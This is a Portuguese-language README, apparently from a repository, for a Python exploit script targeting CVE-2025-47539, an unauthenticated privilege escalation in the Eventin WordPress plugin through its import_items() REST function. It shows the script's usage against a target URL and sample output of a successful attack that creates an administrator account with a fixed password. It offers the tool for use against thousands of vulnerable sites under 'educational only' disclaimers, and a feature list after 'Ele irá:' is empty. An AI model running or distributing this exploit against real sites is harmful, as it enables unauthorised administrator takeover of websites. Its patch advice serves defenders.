
Eventin <= 4.0.26 - Falta de Autorização para Escalação de Privilégios Não Autenticada
O plugin Event Manager, Events Calendar, Tickets, Registrations – Eventin para WordPress é vulnerável a escalonamento de privilégio não autenticado devido a uma verificação de autorização ausente na função import_items().
<= 4.0.26CVE-2025-475399.8 (Crítico)7 de Maio de 202515 de Maio de 2025Atacantes não autenticados podem criar uma requisição maliciosa para a API REST e criar um novo usuário com privilégios de administrador sem qualquer interação do usuário.
Este script Python é uma ferramenta de exploração independente para CVE-2025-47539.
Ele irá:
⚠️ Este script é destinado apenas para uso educacional e avaliações de segurança profissionais.
usage: a.py [-h] -u URL
Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g. http://target.com)
By:Nxploited (Khaled_alenazi) | [email protected]
[+] Exploitation succeeded
[+] Response:
{"message":"Successfully imported speaker"}
[+] Exploited Account Details
Name : Nxploited (Khaled_alenazi)
Email : [email protected]
Username : NxPloted
Password : nxploit123
Role : administrator
Exploit: By: Nxploited (Khaled_alenazi)
Use this script for educational purposes only. I am not responsible for your actions.
Mais de 10.000+ sites WordPress são confirmados como vulneráveis a este exploit.
Todos os administradores de sites que usam Eventin ≤ 4.0.26 devem atualizar imediatamente para a versão 4.0.28 ou superior.
Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizado.
O criador não é responsável por qualquer uso indevido ou dano causado por este script.
Por: Nxploited ( Khaled_Alenazi )
📧 Contato: [email protected]